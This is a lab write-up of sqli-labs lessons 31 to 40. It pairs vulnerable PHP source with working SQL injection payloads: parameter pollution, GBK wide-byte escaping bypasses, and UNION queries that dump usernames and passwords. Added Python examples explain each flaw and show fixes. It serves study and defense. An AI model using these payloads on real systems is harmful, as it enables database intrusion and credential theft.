SQLI-LAB Hands-on Notes (Less 31 - Less 40)
The following is only my own record, written while working through the sqli-lab exercises, and is for reference only. Since I had already studied some SQL injection, most of the content comes without explanation; if anything is unclear, please look it up with a search engine, and you should find what you need.
Less - 31 Protection with WAF
(Lesson 31: Protection with a WAF)
Test:
http://localhost/sqli-lab/Less-31/login.php?id=1&id=3
Note: the record for id 3 is displayed
Source Code:
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);   // first id= in the raw query string
$id=$_GET['id'];                 // PHP keeps the LAST id= of a repeated parameter
whitelist($id1);                 // validates $id1, but the query below uses $id
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
} else{
    print_r(mysql_error());
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    } else {
        header('Location: hacked.php');   // no exit() follows, so the script keeps running
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
    foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            break;
        }
    }
}
Solution:
http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,2,3 --+
Other:
http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,version(),database() --+
http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
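The parser mismatch behind Less-31, as an added Python example (not the lab's own code): the whitelist validates the first id= value, following the lab's java_implimentation(), while the query uses the last one, as PHP's $_GET does. The hardened variant (my own function names) rejects repeated parameters and validates the exact value that reaches the query.

```python
import re
from typing import Optional, Tuple


def first_id_like_java(query_string: str) -> Optional[str]:
    """Follows the lab's java_implimentation(): the FIRST id= value in the raw query string."""
    for pair in query_string.split("&"):
        if pair.startswith("id="):
            return pair[3:]
    return None


def last_id_like_php(query_string: str) -> Optional[str]:
    """PHP's $_GET keeps the LAST occurrence of a repeated parameter."""
    value = None
    for pair in query_string.split("&"):
        key, _, val = pair.partition("=")
        if key == "id":
            value = val
    return value


def whitelist(value: Optional[str]) -> bool:
    """The lab's whitelist(): only a string of digits passes."""
    return value is not None and re.fullmatch(r"\d+", value) is not None


def vulnerable_pipeline(query_string: str) -> Tuple[bool, Optional[str]]:
    """Less-31 as written: (did the WAF pass?, value the query actually uses)."""
    return whitelist(first_id_like_java(query_string)), last_id_like_php(query_string)


def hardened_pipeline(query_string: str) -> Optional[str]:
    """Fix: one id= only, and the validated value is the one handed to the query."""
    ids = []
    for pair in query_string.split("&"):
        key, _, val = pair.partition("=")
        if key == "id":
            ids.append(val)
    if len(ids) != 1 or not whitelist(ids[0]):
        return None  # where the lab issues header('Location: hacked.php')
    return ids[0]


if __name__ == "__main__":
    print(vulnerable_pipeline("id=1&id=3"))   # (True, '3'): validated "1", used "3"
    print(hardened_pipeline("id=1&id=3"))     # None: duplicate parameter rejected
```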
Less - 32 Bypass addslashes()
(Lesson 32: Bypassing addslashes())
Test:
http://localhost/sqli-lab/Less-32/index.php?id='"\\--+
Note: single quote, double quote and backslash all get a backslash prepended
http://localhost/sqli-lab/Less-32/index.php?id=�'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''�\'' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes
http://localhost/sqli-lab/Less-32/index.php?id=�' or 1=1 --+
Note: convert the UTF-8 single quote into its UTF-16 form; this can be done with Decoder - Encoder: UTF8, UTF16, ... (the site needs a VPN to reach)
Source Code:
function check_addslashes($string){
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                    //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                    //escape double quote with a backslash
    return $string;
}
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-32/index.php?id=�' or 1=1 --+
Other:
http://localhost/sqli-lab/Less-32/index.php?id=�' union select 1,version(),database() --+
http://localhost/sqli-lab/Less-32/index.php?id=%af%27 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
http://localhost/sqli-lab/Less-32/index.php?id=%af%27 union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 33 Bypass addslashes()
(Lesson 33: Bypassing addslashes())
Test:
http://localhost/sqli-lab/Less-33/index.php?id=�'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''�\'' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes
Source Code:
function check_addslashes($string){
    $string= addslashes($string);
    return $string;
}
$id=check_addslashes($_GET['id']);   // escaped the same way as in Less-32
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-33/index.php?id=�' or 1=1 --+
Other:
http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,database(),version() --+
http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 34 Bypass Add SLASHES
(Lesson 34: Bypassing addslashes)
Test:
http://localhost/sqli-lab/Less-34/index.php
Note: a GBK-encoded database combined with addslashes() has an encoding vulnerability: once the slash is added, the byte sequence becomes %BF%5C%27 or %FE%5C%27
Source Code:
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
Solution:
uname=1%BF' or 1=1 #&passwd=1%BF' or 1=1 #&submit=Submit
uname=1%FE' or 1=1 #&passwd=1%FE' or 1=1 #&submit=Submit
Other:
uname=1%Bf' union select version(),database() #&passwd=1%BF' or 1=1 #&submit=Submit
uname=1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1%FE' or 1=1 #&submit=Submit
uname=1%FE' union select group_concat(username),group_concat(password) from security.users where 1 #&passwd=1%FE' or 1=1 #&submit=Submit
Note: if this approach still keeps producing encoding errors, check the encoding of the database and of its tables
Less - 35 why care for addslashes()
(Lesson 35: why care about addslashes())
Test:
http://localhost/sqli-lab/Less-35/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 0,1' at line 1
Note: no single or double quotes around id
Source Code:
function check_addslashes($string){
    $string = addslashes($string);
    return $string;
}
$id=check_addslashes($_GET['id']);
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,2,3 #
Other:
http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,version(),database() #
http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 #
Less - 36 Bypass MySQL Real Escape String
(Lesson 36: Bypassing mysql_real_escape_string)
Test:
http://localhost/sqli-lab/Less-36/index.php?id=%BF' or 1=1 #
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes
Source Code:
function check_quotes($string){
    $string= mysql_real_escape_string($string);
    return $string;
}
$id=check_quotes($_GET['id']);
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-36/index.php?id=0%FE' or 1=1%23
Other:
http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,version(),database()%23
http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1%23
Less - 37 MySQL_real_escape_string
(Lesson 37: mysql_real_escape_string)
Test:
http://localhost/sqli-lab/Less-38/index.php
uname=2'&passwd=1'&submit=Submit
Note: fails; no SQL error is reported
Source Code:
$uname = mysql_real_escape_string($uname1);    // the escaping step this lesson is named after (as addslashes() in Less-34)
$passwd= mysql_real_escape_string($passwd1);
mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
Solution:
uname=2%FE' or 1=1 #&passwd=1%FE' or 1=1 #&submit=Submit
Other:
uname=1%FE' union select version(),database() #&passwd=1%FE' or 1=1 #&submit=Submit
uname=1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1%FE' or 1=1 #&submit=Submit
uname=1%FE' union select group_concat(username),group_concat(password) from security.users where 1 #&passwd=1%FE' or 1=1 #&submit=Submit
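An added Python example (not the lab's code) covering Less-32 through Less-37: a byte-wise escaper such as addslashes(), or mysql_real_escape_string() on a connection whose charset was only changed with SET NAMES instead of mysql_set_charset(), places 0x5C after a lone GBK lead byte such as 0xBF, and the GBK decoder on the server side then swallows that backslash as the trail byte of a single character. The charset-aware version (my own function names) decodes with the real connection charset first, so a lone lead byte is rejected and a genuine character whose trail byte is 0x5C is kept intact; the sample inputs are constructed.

```python
import re
from typing import Optional


def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes(): a 0x5C before ' " \\ and NUL, charset-blind."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def live_quote_after_byte_escape(raw: bytes, charset: str = "gbk") -> bool:
    """Escape byte-wise, decode as the GBK connection would, report whether a bare ' survives."""
    text = addslashes(raw).decode(charset, errors="replace")
    return re.search(r"(?<!\\)'", text) is not None


def escape_charset_aware(raw: bytes, charset: str = "gbk") -> bytes:
    """Fix: decode with the real connection charset, escape per character, re-encode.
    A lone lead byte (e.g. 0xBF followed by ') is invalid GBK and raises UnicodeDecodeError."""
    text = raw.decode(charset)
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)


def reject_or_escape(raw: bytes, charset: str = "gbk") -> Optional[bytes]:
    """What a correctly configured escaper does: escape valid text, refuse malformed bytes."""
    try:
        return escape_charset_aware(raw, charset)
    except UnicodeDecodeError:
        return None


if __name__ == "__main__":
    # constructed inputs: a plain quote, then the %BF%27 form from the Less-34 note
    for sample in (b"1'", b"1\xbf'"):
        print(sample, addslashes(sample), live_quote_after_byte_escape(sample), reject_or_escape(sample))
```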
Less - 38 stacked Query
(Lesson 38: stacked queries)
Test:
http://localhost/sqli-lab/Less-38/index.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes
Source Code:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        if($row = mysqli_fetch_row($result)){
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)){
    }
}else{
    print_r(mysqli_error($con1));
}
Note: mysqli_more_results() checks whether a multi-statement query has further results
Solution:
http://localhost/sqli-lab/Less-38/index.php?id=2%FE' or 1=1 %23
Other:
http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,version(),database() %23
http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less - 39 stacked Query Integer type
(Lesson 39: stacked queries, integer type)
Test:
http://localhost/sqli-lab/Less-39/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
Note: numeric type
Source Code:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        if($row = mysqli_fetch_row($result)){
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)){
    }
}else{
    print_r(mysqli_error($con1));
}
Solution:
http://localhost/sqli-lab/Less-39/index.php?id=0 or 1=1 %23
Other:
http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,version(),database() %23
http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less - 40 stacked Query String type Blind
(Lesson 40: stacked queries, string type, blind)
Test:
http://localhost/sqli-lab/Less-40/index.php?id=1
Note: the record for id 1 is displayed normally
http://localhost/sqli-lab/Less-40/index.php?id=1'
Note: no error is displayed
http://localhost/sqli-lab/Less-40/index.php?id=0' or 1=1 %23
http://localhost/sqli-lab/Less-40/index.php?id=0') or 1=1 %23
Note: the record for id 1 is displayed normally
Source Code:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)) {
    if ($result = mysqli_store_result($con1)) {
        if($row = mysqli_fetch_row($result)) {
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)) {
    }
}
Solution:
http://localhost/sqli-lab/Less-40/index.php?id=0%FE') or 1=1 %23
Other:
http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,version(),database() %23
http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
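An added Python example (not the lab's code) for Less-38 through Less-40, with sqlite3 standing in for MySQL: execute() behaves like mysqli_query() and refuses a second statement, executescript() behaves like mysqli_multi_query() and runs it, and a bound parameter treats the whole value as data. The tables, the sample row and the stacked input are constructed; note the single-statement API only blocks stacking, not the UNION payloads used in this section.

```python
import sqlite3

# Less-38 query shape; id is interpolated exactly as the lab does
QUERY = "SELECT * FROM users WHERE id='{id}' LIMIT 0,1"
# constructed input: closes the quote, appends a harmless marker INSERT, comments out the tail
STACKED_INPUT = "1'; INSERT INTO marker VALUES (1) --"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb');   -- constructed sample row
        CREATE TABLE marker(hit INTEGER);               -- a row here means a 2nd statement ran
    """)
    return conn


def marker_rows(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT count(*) FROM marker").fetchone()[0]


def single_statement_api(conn: sqlite3.Connection, user_id: str):
    """Like mysqli_query(): the driver accepts one statement, so the stacked part is refused."""
    try:
        return conn.execute(QUERY.format(id=user_id)).fetchone()
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return "rejected"  # 'You can only execute one statement at a time.'


def multi_statement_api(conn: sqlite3.Connection, user_id: str) -> int:
    """Like mysqli_multi_query(): every ';'-separated statement runs; returns marker row count."""
    conn.executescript(QUERY.format(id=user_id))
    return marker_rows(conn)


def parameterized(conn: sqlite3.Connection, user_id: str):
    """Fix: the value is bound, never parsed as SQL, so ';' and quotes stay plain data."""
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchone()


if __name__ == "__main__":
    conn = fresh_db()
    print(single_statement_api(conn, STACKED_INPUT), marker_rows(conn))  # rejected 0
    print(multi_statement_api(conn, STACKED_INPUT))                      # 1
    print(parameterized(fresh_db(), STACKED_INPUT))                      # None
```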